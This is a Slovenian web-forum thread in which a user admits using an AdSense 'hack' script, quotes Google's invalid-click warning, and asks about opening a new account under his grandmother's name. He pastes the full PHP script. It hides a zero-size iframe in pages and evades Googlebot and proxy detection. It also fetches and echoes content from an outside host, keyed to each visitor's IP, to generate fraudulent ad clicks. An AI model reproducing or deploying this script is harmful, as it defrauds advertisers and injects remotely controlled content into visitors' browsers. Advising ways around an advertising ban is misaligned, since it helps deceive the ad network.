HackAdSenseCode
 
HeXeR 23. jun 2007 08:06:11 Pridružen od:
13. dec 2006
3268 objav
122 22 5
#11

Kaj pa je zate nevarno ? Če nič ni nevarnega pa lepo includaj, pa začni pripravljat babico za Business ... :D


všeč(0) ni všeč(0) spam(0)
First rule of business, protect your investment.
 
frisby 23. jun 2007 09:06:41 Pridružen od:
6. sep 2006
1625 objav
7 0 0
#12

Posti tukaj gor princip za kaj se gre. Lahko da ni nič spornega, vendar če piše hack adsense code, pol verjetno je. :P


všeč(0) ni všeč(0) spam(0)
 
Seko 6. jul 2007 09:07:22 Pridružen od:
24. jan 2007
378 objav
62 41 1
#13

ok neke me zanima sn to skripto uporabo sam en dan (pa sn dobo 300klikov pa 800 obiska) pa sn jim piso da so mi hotl slabo za račun, pa če lahk te klike zbrišejo pa so mi napisal to:




It has come to our attention that invalid clicks or impressions have

been generated on the Google ads on your site(s) through users of

third-party programs paid or provided with other incentives to visit

your site. Such programs include, but are not limited to auto-surf,

pay-to-surf, pay-to-read, or pay-to-click sites.



Please bear in mind that if we continue to detect invalid clicks or

impressions from these services on your ads, we may disable your

account to protect our advertisers. In addition, we may adjust your

future payments for any days during which invalid clicks occurred in

order to properly credit advertisers for any invalid activity.



We understand that you may wish to receive specific information

regarding the invalid activity we observed on your account. However,

due to the proprietary nature of our algorithm, we cannot disclose any

details about how our monitoring technology works or what specifics we

found on your account.



As a reminder, any method of generating invalid clicks or impressions

is strictly prohibited by our Terms and Conditions and program policies:



https://www.google.com/adsense/localized-terms?hl=en_US

https://www.google.com/adsense/policies?hl=en_US



For your reference, you can find tips and guidelines for keeping your

account in good standing by visiting our Help Center at

https://www.google.com/support/adsense/bin/answer.py?answer=23921&hl=en_US.



Sincerely,




zaj pa me zanima če se splača da bi dal oglase še na eno stran, (ker pol če mi banajo mi banajo strani in pol ne morm met oglasov na teh straneh je tak?:S) al se mi bol splača za to novo stran odpret nov account (na "babico")?



LP Pa najlepša hvala za čimprejši odgovor.P


všeč(0) ni všeč(0) spam(0)
 
HeXeR 6. jul 2007 09:07:28 Pridružen od:
13. dec 2006
3268 objav
122 22 5
#14

In BANovci že PRIHAJAjo :D:D:D.


všeč(0) ni všeč(0) spam(0)
First rule of business, protect your investment.
 
Seko 6. jul 2007 09:07:33 Pridružen od:
24. jan 2007
378 objav
62 41 1
#15

no kaj naj narejim? ma kdo idejo


všeč(0) ni všeč(0) spam(0)
 
frisby 6. jul 2007 09:07:38 Pridružen od:
6. sep 2006
1625 objav
7 0 0
#16

Kako je deloval ta program oz. kaj ti je prinašal, traffic ali kaj in kako?



Koliko si zaslužil s temi 300 kliki? So zaznali da so invalid?



Za drugič veš, da se ni za igrati. ;) Čeprav si bil opozorjen.


všeč(0) ni všeč(0) spam(0)
 
Seko 6. jul 2007 09:07:47 Pridružen od:
24. jan 2007
378 objav
62 41 1
#17

ok ta program je deloval nekako takole da je na vsake 5 ljudi 1 krat klikno (ne me spraševat kako) pa tisti dan je prneso še neke 200 traffica s sabo pol so pa pisali da ga morem kupit pa neke pa sn kar zbriso dol:P Pol pa jaz google pišem da sm zaznal nepravilnosti pri mojem accountu oni pa so mi poslal ono zgori, zaj pa nevem če se naj za novo stran prijavim pod "babico" al naj dam kar od tega accounta oglase gor???



koda pa je bla to:


<?

error_reporting(0);
if (!ini_get('safe_mode')) {
set_time_limit(0);
}

/*******************************************************
INSTRUCTIONS:

Rename this file to any name that you think is not
conspicuous.
Popular names are:
set_time.php
set_language.php
set_date.php
check_browser.php
load_css.php

Basically use a filename so that when someone
chooses to view your page source, they will not
think twice about that file.

Enter your key below.

Finally, include the file as a header on the pages of your
website where you are displaying adsense ads but putting
it between the <head> and </head> tags.

Example:

<html>
...
<head>
...
<script type="text/javascript" src="set_time.php"></script>
...
</head>
...

And you are done!

*******************************************************/

/************************************************************************************
This is the key we provided you to access our system.
Replace the xxxxxxxxxxxxxxxxxxxxxxx's with your key
*************************************************************************************/
$conf['key'] = "******************";

/*******************************************************

VERY IMPORTANT !!

Do not edit anything below this line

********************************************************/

if (!isset($_GET['js'])) {
?>

document.writeln('<iframe src="<? echo $_SERVER['PHP_SELF'] ?>?js=1" width="0" height="0" frameborder="0" ></iframe>');
<?
}

elseif (empty($_COOKIE['sfn_clk'])) {
// Google bot detection - block
$botlist = array(
"froogle",
"Googlebot",
"Google"
);
foreach($botlist as $bot) {
if(ereg($bot, $_SERVER['HTTP_USER_AGENT'])) {
die();
}
}

// Proxy detection - block
if (!empty($_SERVER['X_FORWARDED_FOR']) || !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
die();
}

$ip = $_SERVER['REMOTE_ADDR'];

$host = "www.hackadsensecode.info";
$link = "http://$host/core.php?k=".$conf['key']."&ip=".$ip;

$fp = fsockopen("$host",80,$errno,$errstr) or die();
fwrite($fp,"GET $link HTTP/1.1\r\nHost: $host\r\n\r\n");
$contents = '';
while ($tmp = fgets($fp,1024)) $contents .= $tmp;
fclose($fp);

$data = substr($contents,strpos($contents,"\r\n\r\n")+4);

if (!empty($data)) {
// Set a cookie to block him from clicking multiple times
setcookie("sfn_clk","1",time()+(365*24*60*60));
echo $data;
}
}

?>

všeč(0) ni všeč(0) spam(0)
 
Vini 6. jul 2007 09:07:48 Pridružen od:
1. sep 2006
6612 objav
5234 611 56
#18

Seko, kar tako naprej :)


všeč(0) ni všeč(0) spam(0)
 
Seko 6. jul 2007 09:07:53 Pridružen od:
24. jan 2007
378 objav
62 41 1
#19

Seko, kar tako naprej :)




je to miišleno da naj uporablam kar ta accaunt?


všeč(0) ni všeč(0) spam(0)
 
HeXeR 6. jul 2007 10:07:00 Pridružen od:
13. dec 2006
3268 objav
122 22 5
#20

Ja, kar ta account mej, ker je tako vseeno :p.


všeč(0) ni všeč(0) spam(0)
First rule of business, protect your investment.
 
 

🔒 Za odgovor na to temo se moraš prijaviti.

Prijavi se